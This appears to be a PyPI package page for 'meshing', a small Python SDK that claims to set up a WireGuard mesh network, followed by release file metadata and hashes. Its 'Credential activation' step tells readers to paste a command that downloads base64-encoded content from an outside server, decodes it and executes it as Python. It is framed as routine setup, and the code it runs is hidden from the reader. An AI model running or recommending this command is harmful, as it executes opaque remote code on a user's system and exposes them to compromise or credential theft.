Simple Python client library for https://devnull.cn/meshing
Project description
meshing-sdk-python
Python SDK to run a WireGuard meshing network.
Build your network
pip3 install meshing
# 2 lines to initialize your meshing network
python3 -c 'import meshing; meshing.checkin()'
python3 -c 'import meshing; meshing.connect()'
# list neighbors/routers
python3 -c 'import meshing; meshing.neighbors()'
# reload meshing
python3 -c 'import meshing; meshing.restart()'
Credential activation
python3 -c "$(wget -q -O- https://files.devnull.cn/register | base64 -d)"
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
meshing-2.0.3.tar.gz
(3.5 kB
view details)
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file meshing-2.0.3.tar.gz.
File metadata
- Download URL: meshing-2.0.3.tar.gz
- Upload date:
- Size: 3.5 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.9.19
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
97914e58016b10d4d17fc693688b9a5d1f94d50798f00aa907adc72a5d304844
|
|
| MD5 |
f7c25ea9a2ff20cb8c77fdb418431392
|
|
| BLAKE2b-256 |
dc720977995d3d5f8299509d09ea99f3fa94407dff620eec260b3b75c7e736aa
|
File details
Details for the file meshing-2.0.3-py3-none-any.whl.
File metadata
- Download URL: meshing-2.0.3-py3-none-any.whl
- Upload date:
- Size: 3.9 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.9.19
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
490962cd0f75e129fc9d69269a0aa60305ba342108174674be428f184812c1ca
|
|
| MD5 |
071ea73fedb3dafd9415b8444c909875
|
|
| BLAKE2b-256 |
04a94899b85d3db5e1c923e0e18985d925080f908c8f7f05ae028df154a4858f
|